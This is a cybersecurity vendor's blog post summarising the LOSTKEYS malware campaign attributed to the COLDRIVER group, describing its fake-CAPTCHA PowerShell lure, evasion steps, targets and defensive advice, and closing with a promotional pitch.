In a recent wave of cyber espionage, Russian hackers linked to the group COLDRIVER have deployed a new malware strain known as LOSTKEYS. This sophisticated attack utilizes a fake CAPTCHA as a lure, targeting Western entities, including government officials, NGOs, and journalists, to steal sensitive information.

Key Takeaways

• Malware Name: LOSTKEYS, linked to the COLDRIVER hacking group.

• Attack Method: Utilizes a fake CAPTCHA to trick victims into executing malicious PowerShell commands.

• Target Audience: Focused on Western government officials, military advisors, and NGOs, particularly those connected to Ukraine.

• Capabilities: Capable of stealing files, system information, and running processes from compromised devices.

Overview Of The Attack

The COLDRIVER group, also known by aliases such as UNC4057 and Star Blizzard, has shifted its tactics from traditional credential phishing to deploying malware like LOSTKEYS. This change reflects a broader strategy to enhance their intelligence-gathering capabilities.

The attack begins with victims being directed to a malicious website featuring a fake CAPTCHA prompt. Once the CAPTCHA is “verified,” victims are instructed to copy and paste a PowerShell command into their Windows Run dialog. This command initiates a multi-stage infection process designed to evade detection.

Technical Details Of LOSTKEYS

1. Initial Stage: Victims execute a PowerShell command that downloads a payload from a remote server.

2. Evading Detection: The malware checks for specific display resolution hashes to avoid execution in virtual machines, ensuring that only valid targets are affected.

3. Payload Delivery: The final stage involves downloading and decoding Base64-encoded files, including a Visual Basic Script (VBS) decoder that executes the LOSTKEYS malware on the victim's machine.

Targeted Entities

The primary targets of the LOSTKEYS malware campaign include:

• Current and former advisors to Western governments.

• Journalists and think tanks.

• NGOs, particularly those involved in issues related to Ukraine.

This targeted approach indicates a strategic alignment with Russian geopolitical interests, aiming to disrupt or discredit adversarial organizations.

Implications Of The Attack

The deployment of LOSTKEYS marks a significant evolution in COLDRIVER's tactics, showcasing their ability to adapt and employ more complex methods of cyber espionage. The malware's capabilities to exfiltrate sensitive data and conduct reconnaissance activities pose serious risks to national security and the integrity of information held by targeted organizations.

As the ClickFix method continues to gain traction among various threat actors, the cybersecurity community must remain vigilant and enhance their defenses against such sophisticated social engineering tactics. Organizations are encouraged to implement robust security measures, including user education on recognizing phishing attempts and the importance of verifying the authenticity of online prompts.

The emergence of LOSTKEYS highlights the ongoing threat posed by state-sponsored hacking groups and the need for continuous adaptation in cybersecurity strategies to protect sensitive information from falling into the wrong hands. As cyber threats grow more sophisticated, staying informed is more important than ever. BetterWorld Technology delivers advanced cybersecurity solutions designed to adapt with the threat landscape—ensuring your business stays protected while continuing to innovate. Take the first step toward stronger security—contact us today for a consultation!

Sources

• Russian Hackers Using ClickFix Fake CAPTCHA to Deploy New LOSTKEYS Malware, The Hacker News.

• ‘Lostkeys’ Malware Targets Western Entities in ClickFix Campaign, TechNadu.